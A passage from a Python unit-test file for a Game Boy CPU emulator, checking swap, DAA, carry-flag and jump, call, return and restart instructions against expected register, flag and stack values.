# Make sure the zero flag does not get set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0xb4)
self.cpu.set_zero_flag()
self.cpu.swap_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x4b)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_swap_regHLaddr_2(self):
# Make sure the zero flag gets set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x00)
self.cpu.reset_zero_flag()
self.cpu.swap_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_cpl(self):
self.cpu.set_reg8('a', 0x55)
self.cpu.cpl()
self.assertEqual(self.cpu.get_reg8('a'), 0xaa)
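# DAA corrects A to packed BCD after an addition or subtraction. The
# correction value (0x00, 0x06, 0x60, or 0x66 after an add; 0x00, 0xfa,
# 0xa0, or 0x9a after a subtract) depends on the N, H, and C flags and on
# the value in A; the per-test comments below give the expected correction.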
def test_daa_1(self):
self.cpu.reset_sub_flag()
self.cpu.reset_carry_flag()
self.cpu.reset_halfcarry_flag()
self.cpu.set_reg8('a', 0x88)
self.cpu.daa()
self.assertEqual(self.cpu.get_reg8('a'), 0x88)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_daa_2(self):
# 28 = 0x1c
self.cpu.set_reg8('a', 28)
self.cpu.reset_carry_flag()
self.cpu.reset_halfcarry_flag()
self.cpu.reset_sub_flag()
self.cpu.daa()
self.assertEqual(self.cpu.get_reg8('a'), 34)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_daa_3(self):
self.cpu.reset_sub_flag()
self.cpu.reset_carry_flag()
self.cpu.set_halfcarry_flag()
self.cpu.set_reg8('a', 0x82)
self.cpu.daa()
# add 0x06
self.assertEqual(self.cpu.get_reg8('a'), 0x88)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_daa_4(self):
self.cpu.reset_sub_flag()
self.cpu.reset_carry_flag()
self.cpu.reset_halfcarry_flag()
self.cpu.set_reg8('a', 0xa8)
self.cpu.daa()
# add 0x60
self.assertEqual(self.cpu.get_reg8('a'), 0x08)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_daa_5(self):
self.cpu.reset_sub_flag()
self.cpu.reset_carry_flag()
self.cpu.reset_halfcarry_flag()
self.cpu.set_reg8('a', 0x9a)
self.cpu.daa()
# add 0x66
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_daa_6(self):
self.cpu.reset_sub_flag()
self.cpu.reset_carry_flag()
self.cpu.set_halfcarry_flag()
self.cpu.set_reg8('a', 0xa3)
self.cpu.daa()
# add 0x66
self.assertEqual(self.cpu.get_reg8('a'), 0x09)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_daa_7(self):
self.cpu.reset_sub_flag()
self.cpu.set_carry_flag()
self.cpu.reset_halfcarry_flag()
self.cpu.set_reg8('a', 0x18)
self.cpu.daa()
# add 0x60
self.assertEqual(self.cpu.get_reg8('a'), 0x78)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_daa_8(self):
self.cpu.reset_sub_flag()
self.cpu.set_carry_flag()
self.cpu.reset_halfcarry_flag()
self.cpu.set_reg8('a', 0x1a)
self.cpu.daa()
# add 0x66
self.assertEqual(self.cpu.get_reg8('a'), 0x80)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_daa_9(self):
self.cpu.reset_sub_flag()
self.cpu.set_carry_flag()
self.cpu.set_halfcarry_flag()
self.cpu.set_reg8('a', 0x33)
self.cpu.daa()
# add 0x66
self.assertEqual(self.cpu.get_reg8('a'), 0x99)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_daa_10(self):
self.cpu.set_sub_flag()
self.cpu.reset_carry_flag()
self.cpu.reset_halfcarry_flag()
self.cpu.set_reg8('a', 0x99)
self.cpu.daa()
# add 0x00
self.assertEqual(self.cpu.get_reg8('a'), 0x99)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_daa_11(self):
self.cpu.set_sub_flag()
self.cpu.reset_carry_flag()
self.cpu.set_halfcarry_flag()
self.cpu.set_reg8('a', 0x88)
self.cpu.daa()
# add 0xfa
self.assertEqual(self.cpu.get_reg8('a'), 0x82)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_daa_12(self):
self.cpu.set_sub_flag()
self.cpu.set_carry_flag()
self.cpu.reset_halfcarry_flag()
self.cpu.set_reg8('a', 0x77)
self.cpu.daa()
# add 0xa0
self.assertEqual(self.cpu.get_reg8('a'), 0x17)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_daa_13(self):
self.cpu.set_sub_flag()
self.cpu.set_carry_flag()
self.cpu.set_halfcarry_flag()
self.cpu.set_reg8('a', 0x77)
self.cpu.daa()
# add 0x9a
self.assertEqual(self.cpu.get_reg8('a'), 0x11)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_daa_14(self):
with self.assertRaises(ValueError) as cm:
self.cpu.reset_sub_flag()
self.cpu.set_carry_flag()
self.cpu.set_halfcarry_flag()
self.cpu.set_reg8('a', 0x34)
self.cpu.daa()
def test_daa_15(self):
with self.assertRaises(ValueError) as cm:
self.cpu.set_sub_flag()
self.cpu.set_carry_flag()
self.cpu.set_halfcarry_flag()
self.cpu.set_reg8('a', 0x56)
self.cpu.daa()
def test_daa_16(self):
# Example from the Gameboy Programming Manual
self.cpu.reset_halfcarry_flag()
self.cpu.reset_carry_flag()
self.cpu.set_reg8('a', 0x45)
self.cpu.set_reg8('b', 0x38)
self.cpu.add_reg8toreg8('b', 'a')() # 0x7d, c=0, h=0
self.cpu.daa()
self.assertEqual(self.cpu.get_reg8('a'), 0x83)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.cpu.sub_reg8fromreg8('b', 'a')()
self.cpu.daa()
self.assertEqual(self.cpu.get_reg8('a'), 0x45)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_scf(self):
self.cpu.reset_carry_flag()
self.cpu.scf()
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.cpu.scf()
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_ccf(self):
self.cpu.set_carry_flag()
self.cpu.ccf()
self.assertEqual(self.cpu.get_carry_flag(), 0)
class TestZ80Control(unittest.TestCase):
def setUp(self):
self.cpu = slowboy.z80.Z80()
def test_jr_imm8(self):
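# The signed offset is added after the operand byte has been fetched,
# so PC becomes 0x1001 + 0x20 = 0x1021.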
self.cpu.pc = 0x1000
rom = [0 for _ in range(0x2000)]
rom[0x1000] = 0x20
self.cpu.mmu.rom = bytes(rom)
self.cpu.jr_imm8()()
self.assertEqual(self.cpu.get_pc(), 0x1021)
def test_jr_imm8_2(self):
self.cpu.pc = 0x1000
rom = [0 for _ in range(0x1001)]
rom[0x1000] = 0xe0
self.cpu.mmu.rom = bytes(rom)
self.cpu.jr_imm8()()
self.assertEqual(self.cpu.get_pc(), 0x0fe1)
def test_jr_imm8_nz(self):
self.cpu.pc = 0x1000
self.cpu.mmu.rom = bytes(0x20 for _ in range(0x1001))
self.cpu.reset_zero_flag()
self.cpu.jr_imm8('NZ')()
self.assertEqual(self.cpu.get_pc(), 0x1021)
def test_jr_imm8_z(self):
self.cpu.pc = 0x1000
self.cpu.mmu.rom = bytes(0x20 for _ in range(0x1001))
self.cpu.set_zero_flag()
self.cpu.jr_imm8('Z')()
self.assertEqual(self.cpu.get_pc(), 0x1021)
def test_jr_imm8_nc(self):
self.cpu.pc = 0x1000
self.cpu.mmu.rom = bytes(0x20 for _ in range(0x1001))
self.cpu.reset_carry_flag()
self.cpu.jr_imm8('NC')()
self.assertEqual(self.cpu.get_pc(), 0x1021)
def test_jr_imm8_c(self):
self.cpu.pc = 0x1000
self.cpu.mmu.rom = bytes(0x20 for _ in range(0x1001))
self.cpu.set_carry_flag()
self.cpu.jr_imm8('C')()
self.assertEqual(self.cpu.get_pc(), 0x1021)
def test_jr_imm8_c_2(self):
self.cpu.pc = 0x1000
# 0xe0 is -0x20 in two's complement
self.cpu.mmu.rom = bytes(0xe0 for _ in range(0x1001))
self.cpu.set_carry_flag()
self.cpu.jr_imm8('C')()
# 0x1001 - 0x20 = 0x0fe1
self.assertEqual(self.cpu.get_pc(), 0x0fe1)
def test_jr_imm8_badcond(self):
with self.assertRaises(ValueError) as cm:
self.cpu.jr_imm8('A')()
def test_jp_imm16addr(self):
self.cpu.pc = 0
self.cpu.mmu.rom = bytes([0x00, 0xd0])
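# the 16-bit operand is read little-endian: 0xd000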
self.cpu.jp_imm16addr()()
self.assertEqual(self.cpu.get_pc(), 0xd000)
def test_jp_reg16addr(self):
self.cpu.pc = 0xc000
self.cpu.set_reg16('hl', 0xd000)
self.cpu.jp_reg16addr('hl')()
self.assertEqual(self.cpu.get_pc(), 0xd000)
def test_jp_imm16addr_nz(self):
# TODO: provide a consistent test ROM in setUp
self.cpu.pc = 0
self.cpu.mmu.rom = bytes([0x00, 0x20])
self.cpu.reset_zero_flag()
self.cpu.jp_imm16addr('NZ')()
self.assertEqual(self.cpu.pc, 0x2000)
def test_jp_imm16addr_z(self):
self.cpu.pc = 0
self.cpu.mmu.rom = bytes([0x00, 0x20])
self.cpu.set_zero_flag()
self.cpu.jp_imm16addr('Z')()
self.assertEqual(self.cpu.pc, 0x2000)
def test_jp_imm16addr_nc(self):
self.cpu.pc = 0
self.cpu.mmu.rom = bytes([0x00, 0x20])
self.cpu.reset_carry_flag()
self.cpu.jp_imm16addr('NC')()
self.assertEqual(self.cpu.pc, 0x2000)
def test_jp_imm16addr_c(self):
self.cpu.pc = 0
self.cpu.mmu.rom = bytes([0x00, 0x20])
self.cpu.set_carry_flag()
self.cpu.jp_imm16addr('C')()
self.assertEqual(self.cpu.pc, 0x2000)
def test_jp_imm16addr_badcond(self):
self.cpu.pc = 0
with self.assertRaises(ValueError) as cm:
self.cpu.mmu.rom = bytes([0x00, 0x20])
self.cpu.set_carry_flag()
self.cpu.jp_imm16addr('B')()
def test_ret(self):
self.cpu.pc = 0x1234
self.cpu.sp = 0xd000
self.cpu.mmu.set_addr(0xd000, 0x00)
self.cpu.mmu.set_addr(0xd001, 0xc0)
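# return address 0xc000 is stored little-endian at the stack pointer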
self.cpu.ret()()
self.assertEqual(self.cpu.get_pc(), 0xc000)
self.assertEqual(self.cpu.sp, 0xd002)
def test_ret_cond_z(self):
self.cpu.pc = 0x1234
self.cpu.sp = 0xd000
self.cpu.mmu.set_addr(0xd000, 0x00)
self.cpu.mmu.set_addr(0xd001, 0xc0)
self.cpu.reset_zero_flag()
self.cpu.ret(cond='z')()
self.assertEqual(self.cpu.get_pc(), 0x1234)
self.assertEqual(self.cpu.sp, 0xd000)
self.cpu.set_zero_flag()
self.cpu.ret(cond='z')()
self.assertEqual(self.cpu.get_pc(), 0xc000)
self.assertEqual(self.cpu.sp, 0xd002)
def test_ret_cond_nz(self):
self.cpu.pc = 0x1234
self.cpu.sp = 0xd000
self.cpu.mmu.set_addr(0xd000, 0x00)
self.cpu.mmu.set_addr(0xd001, 0xc0)
self.cpu.set_zero_flag()
self.cpu.ret(cond='nz')()
self.assertEqual(self.cpu.get_pc(), 0x1234)
self.assertEqual(self.cpu.sp, 0xd000)
self.cpu.reset_zero_flag()
self.cpu.ret(cond='nz')()
self.assertEqual(self.cpu.get_pc(), 0xc000)
self.assertEqual(self.cpu.sp, 0xd002)
def test_ret_cond_2_c(self):
self.cpu.pc = 0x1234
self.cpu.sp = 0xd000
self.cpu.mmu.set_addr(0xd000, 0x00)
self.cpu.mmu.set_addr(0xd001, 0xc0)
self.cpu.reset_carry_flag()
self.cpu.ret(cond='c')()
self.assertEqual(self.cpu.get_pc(), 0x1234)
self.assertEqual(self.cpu.sp, 0xd000)
self.cpu.set_carry_flag()
self.cpu.ret(cond='c')()
self.assertEqual(self.cpu.get_pc(), 0xc000)
self.assertEqual(self.cpu.sp, 0xd002)
def test_ret_cond_2_nc(self):
self.cpu.pc = 0x1234
self.cpu.sp = 0xd000
self.cpu.mmu.set_addr(0xd000, 0x00)
self.cpu.mmu.set_addr(0xd001, 0xc0)
self.cpu.set_carry_flag()
self.cpu.ret(cond='nc')()
self.assertEqual(self.cpu.get_pc(), 0x1234)
self.assertEqual(self.cpu.sp, 0xd000)
self.cpu.reset_carry_flag()
self.cpu.ret(cond='nc')()
self.assertEqual(self.cpu.get_pc(), 0xc000)
self.assertEqual(self.cpu.sp, 0xd002)
def test_ret_cond_2_badcond(self):
with self.assertRaises(ValueError) as cm:
self.cpu.ret(cond='aa')()
def test_reti(self):
self.cpu.pc = 0x1234
self.cpu.sp = 0xd000
self.cpu.mmu.set_addr(0xd000, 0x00)
self.cpu.mmu.set_addr(0xd001, 0xc0)
self.cpu.reti()
self.assertEqual(self.cpu.get_pc(), 0xc000)
self.assertEqual(self.cpu.sp, 0xd002)
def test_call_imm16addr(self):
self.cpu.pc = 0x1234
self.cpu.sp = 0xd000
rom = [0 for _ in range(0x2000)]
rom[0x1234] = 0x00
rom[0x1235] = 0x20
self.cpu.mmu.rom = bytes(rom)
self.cpu.call_imm16addr()()
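# the return address 0x1236 (pc past the 2-byte operand) is pushed:
# high byte at sp+1, low byte at sp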
self.assertEqual(self.cpu.get_pc(), 0x2000)
self.assertEqual(self.cpu.sp, 0xcffe)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp + 1), 0x12)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp), 0x36)
def test_call_imm16addr_z(self):
self.cpu.pc = 0x1234
self.cpu.sp = 0xd000
rom = [0 for _ in range(0x2000)]
rom[0x1234] = 0x00
rom[0x1235] = 0x20
rom[0x1236] = 0x00
rom[0x1237] = 0x20
self.cpu.mmu.rom = bytes(rom)
self.cpu.reset_zero_flag()
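# condition not met: the call is skipped, sp is untouched and pc only
# steps over the 2-byte operand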
self.cpu.call_imm16addr('z')()
self.assertEqual(self.cpu.get_pc(), 0x1236)
self.assertEqual(self.cpu.sp, 0xd000)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp + 1), 0x00)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp), 0x00)
self.cpu.set_zero_flag()
self.cpu.call_imm16addr('z')()
self.assertEqual(self.cpu.get_pc(), 0x2000)
self.assertEqual(self.cpu.sp, 0xcffe)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp + 1), 0x12)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp), 0x38)
def test_call_imm16addr_nz(self):
self.cpu.pc = 0x1234
self.cpu.sp = 0xd000
rom = [0 for _ in range(0x2000)]
rom[0x1234] = 0x00
rom[0x1235] = 0x20
rom[0x1236] = 0x00
rom[0x1237] = 0x20
self.cpu.mmu.rom = bytes(rom)
self.cpu.set_zero_flag()
self.cpu.call_imm16addr('nz')()
self.assertEqual(self.cpu.get_pc(), 0x1236)
self.assertEqual(self.cpu.sp, 0xd000)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp + 1), 0x00)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp), 0x00)
self.cpu.reset_zero_flag()
self.cpu.call_imm16addr('nz')()
self.assertEqual(self.cpu.get_pc(), 0x2000)
self.assertEqual(self.cpu.sp, 0xcffe)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp + 1), 0x12)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp), 0x38)
def test_call_imm16addr_c(self):
self.cpu.pc = 0x1234
self.cpu.sp = 0xd000
rom = [0 for _ in range(0x2000)]
rom[0x1234] = 0x00
rom[0x1235] = 0x20
rom[0x1236] = 0x00
rom[0x1237] = 0x20
self.cpu.mmu.rom = bytes(rom)
self.cpu.reset_carry_flag()
self.cpu.call_imm16addr('c')()
self.assertEqual(self.cpu.get_pc(), 0x1236)
self.assertEqual(self.cpu.sp, 0xd000)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp + 1), 0x00)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp), 0x00)
self.cpu.set_carry_flag()
self.cpu.call_imm16addr('c')()
self.assertEqual(self.cpu.get_pc(), 0x2000)
self.assertEqual(self.cpu.sp, 0xcffe)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp + 1), 0x12)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp), 0x38)
def test_call_imm16addr_nc(self):
self.cpu.pc = 0x1234
self.cpu.sp = 0xd000
rom = [0 for _ in range(0x2000)]
rom[0x1234] = 0x00
rom[0x1235] = 0x20
rom[0x1236] = 0x00
rom[0x1237] = 0x20
self.cpu.mmu.rom = bytes(rom)
self.cpu.set_carry_flag()
self.cpu.call_imm16addr('nc')()
self.assertEqual(self.cpu.get_pc(), 0x1236)
self.assertEqual(self.cpu.sp, 0xd000)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp + 1), 0x00)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp), 0x00)
self.cpu.reset_carry_flag()
self.cpu.call_imm16addr('nc')()
self.assertEqual(self.cpu.get_pc(), 0x2000)
self.assertEqual(self.cpu.sp, 0xcffe)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp + 1), 0x12)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp), 0x38)
def test_rst(self):
for addr in [0x00, 0x08, 0x10, 0x18, 0x20, 0x28, 0x30, 0x38]:
self.cpu.pc = 0x1234
self.cpu.sp = 0xd000
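# each rst vector pushes the current pc (0x1234) and jumps to the fixed address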
self.cpu.rst(addr)()
self.assertEqual(self.cpu.pc, addr)
self.assertEqual(self.cpu.sp, 0xcffe)
self.assertEqual(self.cpu.mmu.get_addr(0xcfff), 0x12)
self.assertEqual(self.cpu.mmu.get_addr(0xcffe), 0x34)
def test_call_imm16addr_badcond(self):
with self.assertRaises(ValueError) as cm:
self.cpu.call_imm16addr('aa')()
def test_stop(self):
# TODO
# For now, just make sure no exception is raised. Later, we want to
# check that the CPU waits the appropriate number of cycles.
self.cpu.stop()
def test_halt(self):
# TODO
# For now, just make sure no exception is raised. Later, we want to
# check that the CPU waits the appropriate number of cycles.
self.cpu.halt()